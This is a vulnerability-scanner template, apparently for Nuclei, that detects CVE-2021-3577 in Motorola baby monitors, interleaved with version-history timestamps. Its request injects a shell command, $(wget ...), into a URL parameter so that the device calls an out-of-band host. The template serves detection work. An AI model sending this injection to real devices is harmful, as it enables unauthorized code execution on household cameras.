2021-09-24 23:13:24 +00:00
id : CVE-2021-3577
info :
name : Motorola Baby Monitors Unauthenticated RCE
author : gy741
severity : critical
2021-09-25 05:58:27 +00:00
description : Vulnerabilities in the interface of Motorola Baby Monitors could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
2021-09-24 23:13:24 +00:00
reference :
- https://randywestergren.com/unauthenticated-remote-code-execution-in-motorola-baby-monitors/
2021-09-25 05:58:27 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3577
2021-09-24 23:13:24 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.80
cve-id : CVE-2021-3577
cwe-id : CWE-78
2021-10-18 20:40:26 +00:00
tags : cve,cve2021,rce,oast,motorola,iot
2021-09-24 23:13:24 +00:00
requests :
- raw :
- |
GET /?action=command&command=set_city_timezone&value=$(wget%20http://{{interactsh-url}})) HTTP/1.1
Host : {{Hostname}}
Accept : */*
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
part : interactsh_protocol # Confirms the HTTP Interaction
words :
- "http"
2021-10-18 21:49:32 +00:00
- type : word
words :
- "set_city_timezone"